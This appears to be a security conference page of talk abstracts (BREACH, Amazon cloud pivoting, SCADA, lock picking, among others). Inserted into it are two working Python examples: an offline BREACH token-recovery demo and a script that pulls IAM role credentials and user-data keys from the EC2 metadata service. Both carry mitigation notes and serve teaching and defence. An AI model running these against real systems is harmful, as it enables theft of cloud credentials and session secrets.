Point of Sale breaches continue to plague the business world. Credit card data is being stolen in ever increasing numbers with no signs of slowing down. How do these breaches occur? How are targets selected? How does the malware get deployed? What does it do once it gets there? Why does Anti-Virus not catch it? Who is performing these breaches? Why? Does it really have that much of an impact on the business world?
Hear the answers to all of these questions, and much more, straight from the field from Trustwave SpiderLabs Director, Chris Pogue. Hear how these investigations are conducted, what cutting-edge tools and techniques are being used to identify this criminal activity, and actually see the malware at work first hand!
Your own pentesting army complete with air support - Philip Polstra
This talk will discuss pentesting with an army of low-powered devices running a custom Linux distro (known as The Deck). The devices are connected via 802.15.4 networking for command and control. The Deck runs on the BeagleBone and BeagleBoard family of devices. An airborne version of The Deck which (along with wireless sensors) is embedded in a flying wing platform will also be presented. All hardware and software (including the flying wing platform) is 100% open source.
BREACH: SSL, Gone in 30 seconds - Angelo Prado and Yoel Gluck
In this hands-on talk, we will introduce new targeted techniques and research that enable an attacker to reliably retrieve encrypted secrets (session identifiers, CSRF tokens, OAuth tokens, email addresses, ViewState hidden fields, etc.) from an HTTPS channel. We will demonstrate that this new compression oracle is real and practical by executing a PoC against a major enterprise product in under 30 seconds, from any modern browser or even an email client. We will describe the algorithms behind the attack, how basic statistical analysis can be applied to extract data from dynamic pages, and practical mitigations. Finally, to give the community the ability to build on our research, determine levels of exposure, and deploy appropriate protection, we will release the BREACH tool.
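The compression oracle the abstract describes can be shown end to end with nothing but zlib. The example below is an added illustration, not the speakers' BREACH tool or code from their research: it constructs a toy HTTPS response that carries a hidden CSRF token and reflects a request parameter, reduces each "request" to the one thing an attacker on the network can observe (the compressed body size), and recovers the token one character at a time with the two-tries comparison (guess+padding versus padding+guess). The page markup, the token value `a1b2c3d4e5f6`, the reflected `query` parameter and the `{}` padding are all made up for the example. zlib's `Z_FIXED` strategy (static Huffman tables) is used so that a wrong guess compresses to exactly the same size in both tries and a right guess is exactly one byte smaller; against a real server with dynamic tables the same comparison is simply repeated and decided by majority, which is the "basic statistical analysis" the abstract refers to.

```python
import zlib

# Everything here is constructed for the example: the token, the page and
# the "server" stand in for a real HTTPS application that compresses
# responses and reflects a request parameter next to a per-session secret.
SECRET = "a1b2c3d4e5f6"
ALPHABET = "0123456789abcdef"
# The attacker knows the markup around the secret; the guess is lined up
# with it so that the LZ77 match covers the prefix and the characters
# recovered so far.
PREFIX = 'csrf_token" value="'


def render_page(query: str, secret: str = SECRET) -> bytes:
    """Server side: a hidden CSRF token plus a reflected search string."""
    return (
        "<html><body>\n"
        '<form action="/transfer" method="POST">\n'
        '<input type="hidden" name="csrf_token" value="' + secret + '">\n'
        '<input type="text" name="amount">\n'
        "</form>\n"
        "<p>No results for: " + query + "</p>\n"
        "</body></html>\n"
    ).encode()


def compressed_size(body: bytes) -> int:
    """All the attacker sees on the wire: the length of the compressed body.
    Z_FIXED (static Huffman tables) keeps the demo deterministic; a real
    server uses dynamic tables, so the comparison below is repeated over
    several responses and decided by majority."""
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def oracle(query: str) -> int:
    """One request/response pair, reduced to the only thing that leaks."""
    return compressed_size(render_page(query))


def recover_token(prefix: str, length: int, alphabet: str = ALPHABET,
                  pad: str = "{}") -> str:
    """BREACH 'two tries' guessing. For each candidate c the attacker asks
    for prefix+known+c+pad and prefix+known+pad+c. pad never occurs in the
    page, so for a wrong c both responses hold the same LZ77 match followed
    by the same three literals and compress to the same size. Only the
    right c extends the match by one byte and drops one literal, making the
    first response smaller."""
    known = ""
    while len(known) < length:
        hits = [c for c in alphabet
                if oracle(prefix + known + c + pad) < oracle(prefix + known + pad + c)]
        if len(hits) != 1:
            raise RuntimeError(f"no clean signal at position {len(known)}: {hits}")
        known += hits[0]
    return known


if __name__ == "__main__":
    print("recovered:", recover_token(PREFIX, len(SECRET)))
```

Two things to take from running it: the attacker never decrypts anything, TLS is intact throughout; and the number of "requests" is linear in the token length (16 candidates times 2 tries per character here), which is why the attack fits in seconds. The mitigations the abstract mentions follow from the mechanics: do not reflect attacker input into the same compressed response as a secret, or randomize the secret per request (CSRF token masking) so that the match can never extend.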
Threats have changed in dramatic and unexpected ways around the world over the past year as attackers continue to hone and evolve their strategies and tactics, and Internet-connected devices proliferate. Using the latest data from hundreds of millions of systems around the world and some of the Internet's busiest online services, this session will provide a unique perspective on the global threat landscape, as well as the specific tactics being used by attackers in Canada. The session includes guidance on what organizations can do to protect themselves in the face of the changing threat landscape.
Pivoting in Amazon clouds - Andrés Riancho
From no access at all to the company's Amazon root account, this talk will teach attendees about the components used in cloud applications, such as EC2, SQS, IAM, RDS, meta-data, user-data and Celery, and how misconfigurations in each can be abused to gain access to operating systems, database information, application source code and, through its API, Amazon's services.
The talk will follow a knowledgeable intruder from the first second after identifying a vulnerability in a cloud-deployed Web application through all the steps he takes to reach the root account of the Amazon user.
Apart from the initial vulnerability, a classic remote file include in a Web application which grants access to the front-end EC2 instance, all the other vulnerabilities and weaknesses exploited by this intruder are cloud-specific.
The tools used by this intruder are going to be released after the talk and will provide the following features:
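As an added illustration of the meta-data and user-data step in the pivot described above (this is example code, not the speaker's tools), the script below does what an intruder with a remote file include on the front-end EC2 instance does first: it asks the instance metadata service, which answers any HTTP request from the instance without authentication, for the instance identity, the user-data bootstrap script (a frequent home for pasted-in long-lived keys) and the temporary credentials of the IAM role attached to the instance. Those role credentials work from anywhere, not only on the instance, which is what turns a web bug into API access. The metadata endpoint and paths are the real ones; the `fetch` callable, the `harvest` function, the hypothetical role name `webapp-role` and the canned responses in `FAKE_IMDS` are constructed for the example so it runs offline.

```python
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Dict

# Instance metadata service reachable from every EC2 instance, no credentials
# required. A remote file include or SSRF in the web application is enough to
# make the instance issue these requests on the intruder's behalf.
IMDS = "http://169.254.169.254/latest"

# Shape of an AWS access key id; used to spot keys left in user-data.
ACCESS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")


def http_get(url: str, timeout: float = 2.0) -> str:
    """Real fetcher for use on an instance; 404 (e.g. no role attached) is
    treated as an empty answer, anything else is surfaced."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode()
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return ""
        raise


def harvest(fetch: Callable[[str], str]) -> Dict[str, object]:
    """Collect what the metadata service hands out. `fetch` is whatever GET
    primitive the intruder has (urllib on the box, an include/SSRF bug in
    the application, ...)."""
    found: Dict[str, object] = {
        "instance_id": fetch(f"{IMDS}/meta-data/instance-id").strip(),
        "user_data": fetch(f"{IMDS}/user-data"),
        "roles": {},
    }
    # Long-lived keys pasted into a bootstrap script: a common finding.
    found["keys_in_user_data"] = ACCESS_KEY_RE.findall(found["user_data"])
    # The role document carries temporary keys valid off the instance too.
    roles = fetch(f"{IMDS}/meta-data/iam/security-credentials/").split()
    for role in roles:
        doc = json.loads(fetch(f"{IMDS}/meta-data/iam/security-credentials/{role}"))
        found["roles"][role] = {
            "AccessKeyId": doc["AccessKeyId"],
            "SecretAccessKey": doc["SecretAccessKey"],
            "Token": doc["Token"],
            "Expiration": doc["Expiration"],
        }
    return found


# Constructed stand-in for the metadata service so the example runs offline.
# AKIAIOSFODNN7EXAMPLE is AWS's documentation example key; the rest is made up.
FAKE_IMDS = {
    f"{IMDS}/meta-data/instance-id": "i-0123456789abcdef0\n",
    f"{IMDS}/user-data": (
        "#!/bin/bash\n"
        "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        "python /srv/app/celery_worker.py &\n"
    ),
    f"{IMDS}/meta-data/iam/security-credentials/": "webapp-role\n",
    f"{IMDS}/meta-data/iam/security-credentials/webapp-role": json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLEKEYID0001",
        "SecretAccessKey": "exampleSecretKeyDoNotUse0000000000000000",
        "Token": "exampleSessionToken==",
        "Expiration": "2013-10-09T18:00:00Z",
    }),
}


def fake_fetch(url: str) -> str:
    """Dictionary-backed fetcher mimicking IMDS; unknown paths act like 404."""
    return FAKE_IMDS.get(url, "")


if __name__ == "__main__":
    # On a real instance: harvest(http_get)
    print(json.dumps(harvest(fake_fetch), indent=2))
```

What the defender takes from this: the role attached to a front-end instance is the blast radius of any bug in the application, so scope it to the few API calls the instance needs; never feed keys in through user-data, since it is readable by anything on the box; and treat every outbound HTTP capability of the application (includes, URL fetchers, webhooks) as a path to this endpoint. AWS later added a session-token variant of the service (IMDSv2) specifically to blunt the SSRF case, but least privilege on the role is what limits what the intruder can do with the credentials once obtained.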
FUFW: 5 Steps to Re-architecting Your Perimeter - Mike Rothman
The hype train around next-generation firewalls (NGFW) continues to race forward, but replacing one device with a new shiny object isn't going to ultimately solve the security problem. Securosis analyst Mike Rothman will put NGFW into proper context regarding the evolution of network security and give you 5 steps to move your perimeter protection forward.
Vulnerability analysis of 2013 SCADA issues - Amol Sarwate
This session is the result of a year-long study of the most recent SCADA vulnerabilities and includes root cause analysis, attack vector scrutiny, the consequences of a successful attack, and a remediation study. Attendees will gain insight into the factors behind the nature and magnitude of the harmful outcomes, in order to identify what actions need to be taken to prevent a recurrence.
Jackson Shaw will take the audience through the state of Identity & Access Governance (IAG) and why having an IAG strategy is key to security for corporations big and small. He will also highlight why, in today's rapidly changing environment of APTs, foreign intrigue and hacking, even a strong IAG strategy still leaves you open to potential security breaches. Jackson will also provide some background on how marrying software (IAG) with hardware (next-generation firewalls) presents a new shield against these threats.
In this seminar, Ajay K. Sood will:
How they get in and how they get caught - Schuyler Towne
This talk will take you through the basics of how to pick, rake, bump, impression and bypass a lock, but be careful, you're leaving a lot of evidence behind. Using datagram's work at lockpickingforensics.com as a jumping off point we'll explore how a picker gets in, and how, with careful observation and some practice, we can uncover their method of entry. Using macro photography, illustrations and a few anecdotes I'll give you a basic education in several entry techniques and a primer in lock forensics.
Fiber Channel – Your OTHER Data Center Network - Rob VandenBrink
The majority of large datacenter storage architectures in the world are currently based on Fiber Channel networks. Unfortunately, the emphasis on security, compliance, and audit remains on hosts and traditional Ethernet networks, leaving the Fiber Channel behind as "a storage thing" that for some reason is never secured. Abdicating this responsibility leaves the Fiber Channel network open as a conduit for unfettered, unmonitored recon and theft of data, without regard for security zones you may have defined on your IP network.
In this presentation we'll explore commonly overlooked security settings in Fiber Channel security, how to audit, pentest, or attack fiber channel, and more importantly, how to secure your Fiber Channel network. Live demos of methods and tools are (of course) part of this presentation.
Information security today has evolved into a big data arms race. As vendors create ever more elaborate and sophisticated systems to flag and investigate abnormal events, the huge amounts of log data are driving up costs for storage, processing, software and network transport. A more effective, less costly information security approach is to protect information using encryption in flight and at the communications endpoints. This shift can also help organizations immediately identify whether information has been compromised, and it lends itself well to Infrastructure as a Service cloud environments.
Fortifying Canada's Cyberspace: Together - John Weigelt
The foundation of Canada's economy is increasingly dependent on the digital infrastructure that supports all sectors of industry. Confidence in this infrastructure is essential if individuals and businesses are to harness the opportunities it presents. Maintaining this confidence is a complex challenge, especially in the face of continually evolving threats. Staying ahead of the threats to Canada's cyber infrastructure requires a collective effort, bringing together a variety of public and private sector communities to address the elements that are critical for a cohesive strategy and complementary actions. John Weigelt, National Technology Officer, Microsoft Canada, will explore the connections between Canada's economic prosperity and cyber security. Join John as he also investigates the variety of communities working collectively to maintain and grow assurance in Canada's cyber infrastructure.
The polymorphic nature of malware, the failure of signature-based security tools, and the massive amounts of data and traffic flowing in and out of enterprise networks are making threat management virtually impossible using traditional approaches. Without copies, samples or details, how can one possibly prevent, contain and inform on targeted attacks? This session will demonstrate how to use big data and science to uncover needles in a haystack. The speaker will explain the role that data, traffic and telemetry analysis, as well as graphing, can play in extracting security intelligence about zero-day threats.
Today's Cyber Threat Landscape – Prevention is no cure - Lucas Zaichkowsky
AccessData will talk about today's cyber threat landscape. The traditional cyber security infrastructure is riddled with blind spots: open doorways for threats you can't see, because the tools you're relying on can't see them. We will discuss how to eliminate those blind spots, allowing you to catch the data leakage your DLP misses, detect the new malware your IDS and antivirus don't recognize, and even monitor the Internet activity of employees when they are not logged into your network. The session will highlight how you can leverage all current investments to optimize risk reduction using a single integrated platform. Why use 7 agents when 1 will suffice?
For a synopsis of previous year sessions and events, we invite you to visit our Past Events page.